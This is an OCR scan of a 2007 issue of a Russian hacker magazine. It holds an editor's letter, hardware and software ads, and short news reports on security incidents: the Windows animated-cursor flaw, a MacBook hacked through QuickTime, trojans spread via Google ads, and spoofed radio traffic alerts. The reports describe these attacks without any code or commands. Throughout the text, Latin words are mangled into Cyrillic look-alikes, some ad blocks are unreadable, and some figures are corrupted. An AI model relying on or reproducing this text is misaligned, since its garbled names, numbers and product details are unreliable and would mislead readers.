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□ Одессе говорят, что если дожили до редиски, значит, пережили зиму. Редиску уже 
давно продают, так что прими мои горячие поздравления. Впереди у нас с тобой це- 
лое лето, и это радует. Правда, я сейчас не могу получать от этого удовольствие из-за 
жесткого замеса с вечеринкой 1 0ОхРагіу, которая у нас состоится 1 2 мая, а для тебя 
онауже состоялась. Ты в более выигрышном положении - ты знаешь, как все прошло. 

Хочу сказать, что затея с сайтом рагіу. хакер. ш однозначно будет продолжена, там ты сейчас 
можешь почитать отзывы людей и посмотреть фотографии. Еще этот сайт будет координировать 
все дальнейшие мероприятия журнала. А идей таких оффлайновых тусовок у нас, будь уверен, 
хватает :). 



Впереди лето, и мы не будем его целиком просиживать 
у монитора. Правда ведь? :) 

пікіІ022, главред 
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ТПедлпеыА, 




Около 



45000 



новых фишерских сайтов появляется в интернете каждый 



месяц. 24% из них находятся в США и только 3% — в России. 



Бкуре-тусовка 
с читателями 

3 июня в 9 часов вечера мы устраиваем опііпе-тусовку в 
формате ЗкуреСазМсонференции и будем рады пообщаться 
с тобой, обсудить все важные дела и ответить на любые 
вопросы. 

В ходе конференции мы проведем несколько быстрых 
хакерских конкурсов и разыграем 5 суперстильных и фун- 
кциональных \ѵеЪ-камер от А4ТесЬ (смотри, какие крутые: 
ѵ\ллллла4ЩсЬ.іпГо/ѵ\геЪсапт) . Так что у тебя есть реальный 
шанс поднять крутую камеру и расширить для себя рамки 
интернет-общения. 

Все подробности — на нашем форуме іогит.хакер.ги . 



Солнечная клавиатура Первый вирусдля іРосІ 




Надоели провода, и ты решил перейти на беспроводную клавиатуру с 
мышкой? Но с ними возникает другая проблема — надо постоянно менять 
батарейки, которые садятся в самый неподходящий момент. Компания 
Оепіиз избавит тебя и от этой необходимости при одном условии: надо 
выйти из тени :), то есть находиться под прямыми солнечными лучами. 
Комплект из клавиатуры и мыши ЗІітЗіж 820 Зоіаг^ігег умеет подзаряжать 
аккумуляторы от солнечного света, когда ты работаешь под его лучами, 
или от кабеля ИЗВ, когда солнце зашло за горизонт или спряталось за тучи. 
При этом комплект соответствует большинству современных требований: 
эргономичная форма, 17 мультимедийных клавиш быстрого доступа, пере- 



Во время перерыва между конференциями на НІТВ’е, когда я трындил 
с Микко Хайпоненом, он сообщил мне, что они в Р-Зесиге только что 
получили первый сигнал о вирусе для іРосі. Концептуальную заразу, 
которая получила название Озіо, написали словацкие вирмейкеры, и 
она носит, конечно, демонстрационных характер. «Вирус» распро- 
страняется под видом обычного приложения и работает только в том 
случае, если на ІРосі установлен Ілпих. Он сканирует всю файловую 
систему в поисках еіі-файлов и заражает каждый из них таким 
образом, чтобы при запуске приложений появлялось сообщение: 

«Уои аге іпіесіесі ѵѵііЬ 0$1о іЬе Рігзі: іРосІІлпих Ѵігиз». Вот такие веселые 



/004 



ХАКЕР 05/101 /07 





Домашний 
интернет- центр 

дли Интернета 
и цифрового ТВ 
Р-660НТИ 




Разведение Интернета в домашних условиях 



Интернета ВДО<МО жватц? в№м 
Компьютеру в детской комнате, 
п рЫСТДВне ЯЛ* >іиТе|И.кТЦй«0ГО 
телевидения в- гостиной, 
6есн|мйо 1 №с^умо^іб’У^у & кд&игсете 

Ин тср>№т-цсгитрьі ЕуЯЕІ_ ОбЪЩннит 
дсмаожкжэ компьютерную технику 

О СОТЫ4ГЮ№ЛОіДЙ>Т ІС Ииторнету 





Р-бІОЬ 

Кошч^іНр^. ыеддо ЛРИ_ 
ДМ нЛя 

ІЗДіТ^ІІГ порпш ІГІ* 



Р^КИТГ 

АК12т Діи 
«ШПьйВДйС 
гкі^-ти Г ІЬгггіН 



НИ СКОРОСТИ, достаточной ДЙМГО ДЛЯ 
тепеямдвнигя высокой четкости. 
Цифровые Фотографии, музыка 
И ФИЛЬМЫ будут ДОСТУПНЫ II КЕОКДОМ 
уголке Нйшьн П дОм.Ч ПОД нЛМЪнрй 
зашитой От иаксрскпк атак, 

Чтобы настроить лодклютенме 

ч Интернету, но нужно вла&ат^д 




Р-М4ИШ 

Ы4ДОІ хии- 
і ін-ѵ 1*441 ІЛВ кЕііігі і і 
Л ічг>--Ріс-гп ГР. -и 1 І-пгъагпш*и 



в текчн-іелкие подробности или 
оыйыьД гь на лОм СпёцншзиСтй. 

В любой точке России достаточно 
иыОригь муріщіщорв А[>5і и тариф 
из списка, а все остальное за вас 
в считаны^ минуты сд^лае г нпн-еи 
нмтсппс-к гуалы ют тсяноло*ня 
ЕуХЕІ. МвіРііепЛ. 





Р^ВДНТ 

ДдоВД'рИ Ц«г^у-ч^^тнгр 
Ё НЗДсжШ ДОН-Т- ДОй ГДОт 
н.-шг^ьт+п-г- Л 1Й-ПГЪгЪГГЛЙШ 



Р-ЁЁОНТѴі 1 
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Взгляд сквозь стены 

Представь, валяешься 
ты у себя на диване с 
ноутбуком и занимаешь- 
ся новым интересным 
хаком, а в это время в 
соседней квартире сидят 
представители доблест- 
ных спецслужб и через 
стены смотрят изображе- 
ние на твоем мониторе. 

Выдумка? Доктор Маркус 
Кун из Кембриджского университета так не считает. Используя 
оборудование стоимостью 1000 фунтов стерлингов ($2к), которое 
включает антенну и радиоприемник, он благополучно перехватил 
изображение с экрана ноутбука через две комнаты и три стены. Тем 
самым он опроверг мнение о том, что подобный перехват возмо- 
жен только с ЭЛТ-мониторов, а жидкокристаллические дисплеи от 
этого защищены. Радиосигнал излучают кабели, которые передают 
изображение на монитор. Поскольку изображение передается 
попиксельно, радиосигнал кешируется и затем выстраивается в го- 
товое изображение. Но с одного ноутбука считать сигнал не удалось 
— металлические петли, которые удерживали кабель, создавали 
помехи. В качестве средств защиты доктор Кун указал на использо- 
вание защищенных кабелей и специальных комбинаций цветов. 




Свежие сервачки 

На выставке СеВІТ 2007 в Ганновере компания А51ІЗ представила свои 
последние достижения в области серверных технологий. Эти дости- 
жения включали новые бескабельные серверы с резервным блоком 
питания, материнские платы для процессоров ІШеІХеоп, в том числе и 
позволяющие установить два четырехъядерных процессора, и новую 
технологию А5113 МетСооІ, на которой остановимся подробнее. На 
многих серверах используется технология РВ-НІММ фІММ с полной 
буферизацией), которая позволяет увеличить скорость и объем памяти. 
Но у нее есть одна проблема — высокое тепловыделение, из-за которого 
возможно снижение производительности и повышение шума (из-за 
работы больших кулеров охлаждения корпуса) . 

Компания АЗІІЗ предлагает устанавливать специально разработанные 
ими кулеры непосредственно на модули памяти. Благодаря продуман- 
ному дизайну установка не вызывает особых трудностей и не требует 
дополнительных инструментов. Простое и дешевое решение, которое 
позволит системным администраторам сохранить хоть немного нерв- 
ных клеток. 




9000 000 



писем со спамом и вирусами отфильтровывает корпоративная 



почтовая система Місгозой каждый день. Доставляет до адресатов она 1 миллион писем. 




Мобильная клава 



Возникла у меня недавно такая, возможно, знакомая тебе ситуация 
— надо было по зтз отправить другу ответ на билет, который попался 
ему на экзамене. Набор его посредством стандартной телефонной кла- 
виатуры доставил мне несколько «незабываемых» минут, в связи с чем 
я озадачился покупкой маленькой складной клавиатуры, чтобы было 
удобно писать бгпб или общаться по ІС(^ вдали от дома. Так вот как раз для 
таких случаев фирма СепіііБ сделала ВІиеЩюіК-клавиатуру. В сложенном 
состоянии эта клава с запасом помещается в карман; удобная подставка 
позволяет поместить телефон или КПК прямо перед глазами. При этом 
клавиатура имеет 10 програм- 
мируемых клавиш и 6 клавиш 
быстрого доступа к различным 
элементам меню. С таким 
девайсом приятно скоротать 
пару часов в кафе, общаясь с 
народом из контакт-листа 
или редактируя записи в 
календаре. Имей в виду, 
клава уже поступила в 
продажу и стоит около 
100 долларов. 
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ОЕРО СопприЪегз рекомендует ѴѴіпсІоѵѵз ѴізЪа™ Ноте Ргетіит 



Товар сертифицирован. Реклама. 
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(495) 969-22-00, мдллл/.сіеро.ги 



МЫ ИХ СДЕЛАЛИ! 



Приглашаем вас за покупками в магазины наших партнеров: 

Архангельск «Микромаус», (81 82) 65-1 0-57, ѵѵѵѵѵѵ.тісготоизе.ги • Астрахань «Сателлит», (851 2) 60-07-1 2, 61 -00-1 2, ѵѵѵѵѵѵ.заъеіііі-з.ги • Благовещенск 
«АмИТ», (41 62) 53-30-00, и/и/и ѵ.атіі.ги • Владивосток «Домотехника», (4232) 33-22-33, 45-77-55, и/и/и і.сепъегдъ.ги • Вологда ТЦ «Простор», (8172) 74-88-88, 
и/и /ѵѵ.ргозЬог-ѵоІодда.ги • Екатеринбург «Кардинал», (343) 251-22-22, и/и/и /.кагсііпаі.ги • Иркутск «Комтек», (3952) 25-83-38, ѵѵѵѵѵѵ.котіек.ги] «Хайцентр», 
(3952) 28-80-28, и/и/и /.Ьісепіег.ги • Казань «Планета ДОМО», 8-800—2005-800, и/и/и /.сіото.ги] «Александр ПТД», (843) 557-55-55, и/и/и ѵ.аіехіісі.ги] «АБАК», 
(843) 299-20-49, ѵѵѵѵѵѵ.аЬак.ги • Киров «Технополис», (8332) 48-08-88, ѵѵѵѵѵѵ.ъесЬпороИз.кігоѵ.ги • Краснодар «Владос», (861) 210-10-01, и/и/и /.ѵіасіоз.сот; 
«Домострой», (861) 219-82-08, ѵѵѵѵѵѵ.сіотозігоу.сот • Красноярск «АЛПИ-Сити», (3912) 90-25-90; «Лапландия», (3912) 76-82-13, и/и/и /.аірі.ги • Нижний 
Новгород «ДОМО», 8-800-2005-800, и/и/и /.сіото.ги] «Эксперт», (831 2) 50-67-30, 78-72-22, и/и/и і.Ьа.ги • Новосибирск «Сибвез» (383) 2-1 1 1 -00, ѵѵѵѵѵѵ.зіЬѵег.ги; 
«ДОМО», 8-800-2005-800, и/и/и /.сіото.ги • Оренбург «Компьютерная База 25», (3532) 77-51-04, 63-94-92; и/и/и /.исо.ги «Пермь «МИР компьютеров» 
(3422) 220-66-33, ѵѵѵѵѵѵ.рсѵѵ.регт.ги • Петропавловск-Камчатский «КомПлект», (4152) 26-86-00, и/и/и /.катзЬор.ги] «Камчадалочка», (4152) 26-78-25, 
ѵѵѵѵѵѵ.катсЬасіаІосЬка.ги • Саратов «ДОМО», 8-800-2005-800, и/и/и /.сіото.ги', «Сателлит», (8452) 44-09-00, 26-45-68, и/и/и /.заШНъ-з.ги Северодвинск «Микромаус», 
(8184) 50-15-76, 24-18-59, ѵѵѵѵѵѵ.тісготоизе.ги • Сочи «Владос», (8622) 62-17-74, и/и/и /.ѵіасіоз.сот • Ульяновск «ДОМО», 8-800-2005-800, и/и/и /.сіото.ги 
Уфа «ДОМО», 8-800-2005-800, и/и/и /.сіото.ги • Чебоксары «ТСЦ-Элекам», (8352) 63-41-63, ѵѵѵѵѵѵ.еіекат.ги ; «ДОМО», 8-800-2005—800, и/и/и /.сіото.ги 
Южно-Сахалинск «КВЦтрейд», (4242) 72-35-25, ѵѵѵѵѵѵ.кѵс.ги ; «ѴѴігагсІ ЗузЪетз», (4242) 72-66-82, 42-1 7-71 , и/и/и/.и /~з.ги\ «В-Лазер», (4242) 46-27-70, и/и/и /.ѵ-Іазег.сот 
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Гибридим 

телевидение 



Сломалась недавно у меня розетка, к которой подключен 
телевизор. Ну, недавно — это в новогоднюю ночь :). А поскольку 
эта розетка находится глубоко за шкафом, лезть и разбираться, 
что же там случилось, не было никакого желания. Вызов мастера 
также неизбежно сопровождался бы разбором шкафа. В общем, 
жил я без телевизора спокойно, но недавно все-таки соскучился 
на нему. И вот что я придумал: поскольку стационарный компью- 
тер все равно большую часть времени простаивает (пользуюсь 
я ноутбуком), то, подключив к нему ТВ-тюнер, я вполне смог 
бы смотреть на нем телепередачи. Выбирая себе подходящую 
модель, я присмотрелся к Соіѵіеѵѵ РСІ НуЬгісі, который совме- 
щает в себе аналоговый и цифровой тюнеры. При этом он может 
записывать сразу все цифровые каналы одновременно, благодаря 
чему пропустить что-то интересное будет практически невозможно. А 
еще он умеет организовывать вещание по сети, благодаря чему я смогу 
смотреть телевизор с экрана своего ноутбука, передавая на него сигнал с 
большого компа по беспроводной сети. В общем, имхо, шиз! Ьаѵе. 



66% 



бразильских пользователей интернета хоть раз покупали какой-то товар или 
услугу из спам-рассылки. Как ни странно, амеры менее лояльны к спаму: в США только 
44% пользователей покупают из спама. 




Восьмиядерный монстр от Арріе 



Тебе когда-нибудь хотелось иметь очень крутой 
комп? Настолько крутой, чтобы обычный поль- 
зователь сначала даже не поверил в его сущест- 
вование? Арріе дает такую возможность — нача- 
лись продажи восьмиядерного (!) МасРго. Этот 
комп заряжен двумя четырехъядерными процес- 
сорами ІШеІХеоп СІоѵегЮѵт, по 3,00 гигагерца 
каждый. Одними процессорами ограничиваться 
не будем — добавим 16 гигабайт оперативной 
памяти, 4 жестких диска по 750 гигабайт, ]\ГѴГОІА 
(^иасіго РХ 4500 в качестве видео и Арріе Сіпета 
Оізріау размером 30 дюймов. А лучше два! 



Только возникают две проблемы. Первая и самая 
главная — стоимость. Вышеперечисленный на- 
борчик обойдется больше чем в 16 тысяч долларов! 
Вторая — непонятно, что с такой мощностью 
делать. Такие компы используются в качестве 
рабочих станций для расчета очень сложных 
трехмерных сцен и подобных ресурсозатратных 
процессов. Простая восьмиядерная конфигурация 
с гигом оперативки, 250 гиговым хардом и 7300СТ 
картой выйдет в ^ 4000 долларов. Для домашнего 
компа это тоже явный перебор, но помеч- 
тать-то ведь можно? :) 



Мобильная играбельность 



При выборе ноутбука постоянно приходится идти на компромиссы: либо производитель- 
ность и большой экран, либо малый вес и приличное время работы. Но что делать, 
если я хочу небольшой ноутбук, который можно будет носить с собой не в походном 




чемодане, и производительность, которая позволит поиграть 
хоть не в самые требовательные, но все-таки не в офисные игры? 
Открывая свою новую линейку продуктов еХРКЕЗз, компания 
Ш представила модель К400, которая как раз соответствует пе- 
речисленным требованиям. Монитор с диагональю 14,1 дюйма 
сохраняет буку приемлемые размеры и небольшое энергопотреб- 
ление. В тоже время видеокарта АТІ МоЫШу КабеопХ2300 в паре 
с последними процессорами Іпіеі дает необходимую производи- 
тельность в играх. Опционально можно взять веб-камеру, чтобы 
радовать своим лицом друзей в Зкуре. Встроенный кардридер, 
поддерживающий большинство видов карт памяти, 
позволяет без проблем обмениваться 
информацией с видео- или фотоаппара- 
турой. При этом цена остается вполне 
доступной — от 800 до 1500 долларов. 
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Хард для видео 

Допустим, что ты установил несколько камер видеонаблю- 
дения, которые следят за твоим компьютером, пока тебя нет 
дома, за лестничной клеткой, чтобы знать, кто звонит тебе в 
дверь и кто разбрасывает окурки по полу, и за двором, чтобы 
всегда быть уверенным в сохранности припаркованного ав- 
томобиля. Но ведь потоки видео с этих камер недостаточно 
воспроизводить — их надо еще где-то хранить. Новая серия 
жестких дисков АѴ компании ѴѴезііегп Оі^ПаІтебе поможет. 
Эти харды как раз предназначены для записи потокового 
видео- и аудиоконтента. Они надежные, тихие (не вычислят по 
звуку) и потребляют мало энергии (не вычислятпо счетчику :)). 
Кроме того, они позволяют записывать сразу несколько 
потоков видео высокой четкости, поэтому для всей твоей 
кучи камер достаточно будет использовать один единствен- 
ный жесткий диск. В зависимости от времени хранения 
записываемой информации можно подобрать необходимый 
объем диска — от 80 до 500 гигабайт. 



Отважный Олень 
выходит на просторы 

Вышел в свет стабильный билд іЛшпш 7.04 Реізіу Раѵт (Отважный Олень) . Новая 
сборка отличается встроенными украшательствами сотріг, функцией мигри- 
рования настроек и документов из виндусов, упрощенной работой с кодеками, 
улучшенной работой с железом и т.п. Релиз оказался настолько популярным, что 
первое время сервер не справлялся с наплывом желающих прикоснуться к новому 
«Линуксу для домохозяек», как его называют многие линуксоиды за ненужные, по 
их мнению, украшательства и помощники в настройке. Не прошло и пары дней, 
как в журнале РС \ѴогЫ было опубликовано «Семь советов после установки ІіЬипШ 
7.04», в которых рассказывается, как установить виндусовскую комбинацию пере- 
ключения раскладки клавиатуры, изменить разрешение экрана, поставить вместо 
сотріг более продвинутый Ъегуі и т.д. В общем, если ты всегда хотел приобщиться к 
замечательному миру линуксоводов, но боялся сложностей настройки, то сейчас самое 
время брать Оленя за рога. 



всех уязвимых сайтов уязвимы для 5<ЗІЛгцесі:іоп. Причем судя по количеству 
продаваемых СС-дампов, это не только форумы рйрВВ :) . 



Лживая навигация 

Два итальянских хакера нашли способ взлома системы 
навигации, а точнее, той ее части, которая отвечает за пере- 
дачу дополнительной информации о дорожном движении в 
РМ-диапазоне. С помощью довольно простого оборудования 
им удалось передавать в радиусе около мили информацию, 
содержащую данные о плохой погоде, пробках, занятых пар- 
ковках, дорожных работах, авариях и т.п. Для этого обычно 
используется технология ТгаШс Мезза^е СЬаппеІ (ТМС), 
являющаяся частью Касііо Эат 5узі:ет (КПЗ) . Изначально эта 
технология применялась для вывода на экраны магнитолы 
названия радиостанции, текущей композиции и т.д. Вагізапі 
и Віапсо (так зовут взломщиков) установили, что эти данные 
никак не шифруются, и им не составило большого труда деко- 
дировать их и составить таблицу кодов сообщений. При этом 
они обнаружили коды, которые до этого не использовались, 
например информацию о авианалетах, бомбардировках, 
террористических атаках. Думаю, многие были бы удивлены, 
узнав, что район их дома подвергся бомбардировкам :) . 
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На правах рекламы 




Подробности на сайте ;■ 

ѵѵѵѵ\л/.оѵіРЮкоз.ви 

и по телефону горячей линии 
8 - 800 - 200 - 04-20 г 



ВЫМПЕЛ 

РЕЛЬСОУКЛАДЧИКА 
ОВИП ЛОКОС 



КОМПЛЕКТ ■ 
ДИДЖЕЙСКОЙ 
АППАРАТУРЫ 



1 ИЗ 20 
БИЛЕТОВ 
НА ДВОИХ 4 
НА ПАРОВОЗ 
ОВИП ЛОКОС 



АКЦИЯ С 1 МАЯ ПО 31 ИЮЛЯ! 

Найди код под крышкой бутылки пива «Сокол светлое» или «Сокол джингл» 0.5 л. 

Пошли его в смс-сообщении на номер 4007* или активируй его через сайт - отправив 1 код, 
ты автоматически включаешься в розыгрыш призов. Каждый код под крышкой - номер 
виртуальной рельсы, положив которую, ты можешь проложить дорогу Паровозу Овип 
Локос, который заберет тебя в радостное путешествие по стране. Клади рельсы и участвуй 
в розыгрыше. Ты можешь получить Паровозные картинки и рингтоны за 1 код, Паровозный 
Сй с эксклюзивными миксами за 5 кодов или Вымпел Рельсоукладчика Овип Локос за 
10 кодов. Розыгрыши СО проводятся каждые 10 минут, розыгрыши вымпела проводятся 
каждый час. А также ты можешь получить Паровозную пушку за отправленные 15 кодов. 
Каждый день в розыгрыше - 3 пушки. У тебя есть шанс получить в подарок' комплект 
диджейской аппаратуры или 1 из 20 билетов на двоих на Паровоз Овип Локос. 



П 0В03НЫИ СР 
С ЭКСКЛЮЗИВНЫМИ 
Ч - МИКСАМИ 






Р овью 
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□ігесІХ 1 0 портируют 
на все платформы 



Как известно, десятый ПігесіХ будет официальным дополнением только 
к Висте и нигде больше работать не захочет. Но компания Ра11іп§ Ьеаі 
Зузіетз объявила о работоспособности альфа-версии проекта под назва- 
нием АІкуРпуесі, который ставит своей целью перенос НХ10 сначала 
под ХР’юшку, а потом и на Линукса с Маком. Проект подразумевает 
создание конвертора, с помощью которого игру можно будет адапти- 
ровать для запуска на другой платформе. Іоп Зіокез, журналист из Агз 
Тесйпіса, пытался запустить технологические демки, которые показы- 
вают функционирование проекта под ХР, но эксперимент окончился 
неудачей. При этом он подчеркнул необходимость скачивания и уста- 
новки различных 5ПК объемом около гигабайта. Поскольку наличие 
нового Директа в Висте будет, наверное, самым весовым аргументом 
для геймеров при переходе на новую ОС, этот проект сможет реально 
тормознуть продажи Висты как игровой платформы. Примечательно, 
что главным инженером проекта является 19-летний программист. 



Уникальное предложение! 

Теперьты можешь получать журнал с курьером нетолько в Москве, 
но и в Санкт-Петербурге, Уфе, Нижнем Новгороде, Ростове-на-Дону, 
Волгограде, Самаре, Казани, Перми, Екатеринбурге, Челябинске, 
Омске и Новосибирске. 

Выгоды курьерской доставки: 

1. Сокращение сроков доставки. Теперьдоставка курьером осущест- 
вляется за 3-6 дней. Без дополнительной оплаты. 

2 . Удобно. Не нужно искать журнал —тебе принесутего на работу или 
домой. 

3. Экономия. Получается дешевле на 1 0% и более, чем в розничной 
продаже. А при годовой подписке и комплектах — еще дешевле! 

Для того чтобы получать журнал курьером, необходимо 
указать в купоне и квитанции* один из двух вариантов: 

• свой рабочий адресе названием компании; 

• подробный домашний адрес (подъезд, этажит.д.) с альтернативным 
вариантом доставки в случаетвоего отсутствия дома. Например, код 
домофона и «отдать дежурной» или коддомофона и «положить в п/я» 
ит.д. 

*Купон и квитанцию можно найти на странице 1 40. 



Дополнительную информацию по подписке можно получить по бес- 
платномутелефону: 8 - 800 - 200 - 3-999 или гюетаібіггіоГЗдІс.ги. 



6о 



Более чем V V аккаунтов сотрудников АОБ увел 17-летний Майк Ниве. Парень хотел всего 
лишь вернуть себе свой заблокированный аккаунт, а получилось ой как некрасиво: 
он хакнул систему учета клиентских счетов и напер личной информации аж на $500к. 



Я тебя поимею... курсором! 

В этом месяце была найдена критическая уязвимость ѴѴіпсіоѵуб, позво- 
ляющая вызвать переполнение стека и выполнить произвольный код на 
машине пользователя. Все дело оказалось в анимированных курсорах. 
Представь: заходишь ты на сайт, который подменяет твой системный 
курсор на свой «красивый»; при этом код этого курсора производит 
различные нехорошие действия на твоем любимом компьютере. Этой 
ошибке подвержены практически все версии виндусов, начиная с 
ѴѴіпсіоѵуз 2000 и заканчивая новой Вистой. На мой взгляд, это очень 
интересная ошибка. Очевидно, существует она уже очень продолжи- 
тельное время, и странно, что никому раньше не приходило в голову как 
следует покопаться в этой фиче. Лично я ни разу не видел ни одного ани- 
мированного курсора ни на одном сайте. Мелкософт, конечно, уже вы- 
пустила апдейты, закрывающие эту дырку, но само ее наличие и степень 
критичности может стать весомым аргументом противников новой ОС 
компании в спорах о ее непоколебимой безопасности и нерушимости. 

/ 012 




Г 




ХАКЕР 05/101 /07 




ООО «Сеннхайзер Аудио» 
2-я Звенигородская ул., 13, стр. 43 
Россия, 123022, Москва 
Тел.: (495) 229 37 01 , факс: (495) 229 37 02 
іп^о@зепп(іеізегаисІіо.сот 
ѵѵѵѵѵѵ.зеппііеізегаисііо.сот 
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Лицензионная Ѵізіа в Китае 
никому не нужна 



Ты покупал когда-нибудь 
ѴѴіпсІо\ѵ5? Мне, как и 
многим, единственная ли- 
цензионная копия досталась 
вместе с компьютером. И 
то только потому, что от нее 
нельзя было отказаться. Но 
новую Висту у нас все-таки 
покупают. Вот в Китае все 
интереснее — мелкомяг- 
кие развернули огромную 
рекламную компанию по 
продвижению новой оси 
и даже создали огромную 
проекцию на 421 -метровом 
здании в Шанхае. Но за две 
недели после начала продаж 
китайцы купили только 244 
коробки. Все потому, что пиратство в Китае достигло таких масштабов, 
при которых коробку со взломанной Вистой с отличной полиграфией, не 
снившейся даже многим лицензионным дискам, можно купить всего за 1 
доллар. А на выступлении Билла Гейтса в Пекинском университете один 
из студентов выбежал на сцену с плакатом «Ргее зойжаге, ореп зоигсе», 
что тоже характеризует отношение китайцев к продукции мелкомягких. 
Лично я, посмотрев на эту Висту, благополучно снес раздел с ней и поста- 
вил туда новую Убунту. 




Уши ДЛЯ ЖИЗНИ 

С обычными наушниками типа 
«затычки» у меня постоянно 
возникают сложности: они 
непрерывно выпадают, а через 
некоторое время начинают ба- 
нально болеть уши. А поскольку 
большинство производителей 
плееров предпочитают предо- 
ставлять в комплекте именно 
«затычки», то мне приходится 
после приобретения плеера сразу 
покупать более удобные уши. Но 
тратить на них сумму, сравнимую 
со стоимостью плеера, желания 
никакого нет. А если, кроме 
удобства ношения, хочется еще и 
достойного качества звука, каку более дорогих моделей? В последний 
раз я остановил свой выбор на недорогом варианте от К035 под на- 
званием СХ6. Эти ухи хорошо сидят на голове, кроме того, при очень 
доступной цене меня приятно удивило качество звука. Свои прошлые 
наушники мне было очень жалко — их просто раздавили, не посмот- 
рев, что посадочное место уже занято моим плеером. СХ6, конечно, 
подобного испытания тоже не выдержат, но не так сильно опустошат 
кошелек при их повторной покупке взамен утраченных. 




Непрослушиваемый Бкуре 

Наверняка ты слышал новые пранки с отделениями милиции. Это стало 
возможно из-за распространения услуг связи через ѴоІР, поскольку 
телефонные звонки по Зкуре практически невозможно отследить и 
прослушать, а если используется ѴРИ, то задача усложняется еще в не- 
сколько раз. Поскольку услуги ІР-телефонии приобретают все большую 
популярность и увеличивается число доступных способов шифрования, 
а стоимость содержания специалис- 
тов и оборудования, позволяющих 
прослушивать подобные звонки, очень 
высока, то правительства многих стран 
всерьез подумывают о введении на 
уровне законодательства ограничений 
для ѴоІР-провайдеров, чтобы упростить 
процедуру отслеживания звонков. Я 
очень смутно представляю себе эффек- 
тивность подобных законов, так как при 
этом останется возможность исполь- 
зовать услуги того оператора, который 
находится в другой стране. Достаточно 
вспомнить многочисленные попытки 
закрыть русский сервис аІІоітрЗ.сот. 
продающий музыкальные композиции 
по очень низким ценам в обход амери- 
канского законодательства. 




Спам-рассылка по миллиону адресов с рек- 
ламой средства для увеличения пениса про- 
даст этого зелья на 1000 долларов. 



Армейские хакеры- 
неудачники 

На НГГВ 2007 в Дубае проходили хакерские соревнования СарШге ТЬе Р1а§, 
главным спонсором которых выступала компания ЗсапЙ. Все задания имели 
реверс-инжиниринговую направ- 
ленность — надо было поломать 
несколько виндовых и юниксовых 
бинарников. В турнире принимали 
участие три команды: Аллу 5ітоп§ 

(приписанная ко 2-му батальону 
1 -го Информационного управления 
армии США) , Теат ЕІееГ (из полиции 
Дубая) иКЭМТЕАМ (группа хакеров из 
Болгарии). 

Все происходило достаточно скучно: в небольшой комнате другнапротив друга 
сидели три команды. Амеры в строгихрубашках, дубайские полицейские в 
национальных одеждах и болгарские хакеры из ИЭМТЕАМ. Мне, конечно, 
больше всего импонировали болгары, в их составе была даже коротко стри- 
женная блондинистая девушка, которая сидела с калькулятором и все время 
нажимала на кнопочки. 

В принципе неудивительно, что из всей этой компании только болгары смогли 
преодолеть «отборочный раунд» и взломать самый простой из бинарников. Ни 
на что большее товарищи соревнующиеся оказались не способны, турнир был 
признан несостоявшимся, а призовой фонд сохранили до следующего состяза- 
ния в городе Куала-Лумпур, в Малайзии. Когда об этом объявили, я решил, что 
обязательно привезу в Малайзию Криса Касперский он там всех вздрючит :) . 




ЛИМУ ЯТКП1ѴЯ 
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Макинтоши тоже живые 



На ванкуверской выставке безо- 
пасности СапЗесѴѴезі; отделение 
Тірріп§РоіЩ компании Зсот 
раздавало хакерам два МасЬоок 
Рго. Ноутбуки стояли с доступом в 
интернет и макосью с последними 
апдейтами на борту. Ноутбук и 
приз в 10 тысяч долларов обещали 
тому, кто сможет удаленно 
получить рутовские привилегии. 
За первый день выставки никому не удалось проломить эпловские 
бастионы, поэтому на второй день организаторы предоставили 
возможность открытия ссылки в ЗаГагі. Этой возможностью сразу и 
воспользовались — по почте присланная ссылка вела на страницу с 
эксплойтом, который позволил получить зЬеІІ с привилегиями юзера. 
Авторами этого взлома являются два человека — Дино Дай Зови, 
автор идеи, и Шон Маколи, написавший сам эксплойт. Но поскольку 
привилегии рута все-таки не были получены, взломщикам отдали 
только ноутбук. Позднее выяснилось, что позволившая провести 
взлом ошибка находится в программе (^иіскТіте и что подобный 
взлом возможен и на компьютере с ѴѴіпсІоѵѵз, если на нем установлена 
эта программа. 



боодІеАсІѴѴогсІз 
для хакеров 

Думаешь, в клике по рекламной ссылке че- 
рез контекстную рекламу Гугла нет ничего 
опасного? Ко§ег Тйотрзоп, специалист из 
Ехріоп Ргеѵегціоп ЬаЬз, рассказал недавно о 
забавных случаях, когда хацкеры использовали систему контекстной 
рекламы в качестве удобного сервиса по загрузке троянов. У Гугла 
покупались показы по денежному запросу типа «опНпе Ьапкіп§» и в 
тексте рекламы указывался какой-то популярный домен. Но после 
нажатия на ссылку юзер попадал на рекламируемый домен не сразу, 
а проходя через сайт зшатгаск.огу. на котором с помощью сплоита 
ему заливался троян, отслеживающий посещения сотен известных 
банковских сервисов. При этом такая интересная информация, как 
логины и пароли, перехватывалась и отправлялась авторам трояна. 
Ооо§1е, конечно, закрыл аккаунты, через которые рассылалась 
хацкерская реклама, но сколько их еще осталось и сколько появит- 
ся в будущем? Вероятно, придется как-то менять систему показа 
рекламы, чтобы проверять ссылки, на которые она ведет, или хотя бы 
демонстрировать их пользователю. 






Профессиональные 
возможности в 
профессиональном дизайне 
для надежной радиосвязи! 




® 



портативные радиостанции 

шзш, 



Мощность передатчика ОД Вт 
Евродиапозон 446 МП ц 
8 каналов с 38 СТС88 субканалами 
ЖК дисплей с подсветкой 

Цвет черно-серый 

‘максимальная дальность действия 
обеспечивается при использовании 
радиостанции на открытом пространстве 



УВЕЛИЧЕННАЯ 
ДО б КМ 

ДАЛЬНОСТЬ СВЯЗИ!* 
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ТНЕ АРТ ОР С О М М У N I С АТ I О N 



Товар сертифицирован 



ѵѵѵѵѵѵ.ѵохіеі.ги ѵѵар.ѵохіеі.ги 
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3 СЧАСТЛИВАЯ СЕМЕРКА 

ТЕСТИРОВАНИЕ ВИДЕОКАРТ МБІ НА БАЗЕ ЧИПОВ ЛИНЕЙКИ ИѴЮІА ОЕРОРСЕ 7 



Вот и сменилось еще одно поколение видюх: на сцену вышли новенькие Ш/ГОІА СеРогсе 8 и 
АМБ /АТІ Касіеоп Х2000, приведя за собой БігесГХ 10, унифицированные шейдеры и прочие 
плоды технического прогресса. Как обычно, графические гиганты предлагают решения для 
всех категорий пользователей: геймерам прямая дорога в средний и высший ценовые сек- 
тора, а для тех, чьи запросы к мультимедиа ограничиваются просмотром фильмов, имеется 
целая уйма дешевых карточек, сносно обрабатывающих видеопоток вплоть до новомодных 
РГО-разрешений. Предыдущие линейки, само собой, потихоньку снимаются с производс- 
тва, хотя мы это заметим еще не скоро — запасов выпущенных плат хватит на всех и надо- 
лго. Так почему бы не бросить на них прощальный взгляд? В конце концов, используемых в 
них наработок хватит еще как минимум на одно поколение игрушек, да и ЬігесГХ 10 на всю 
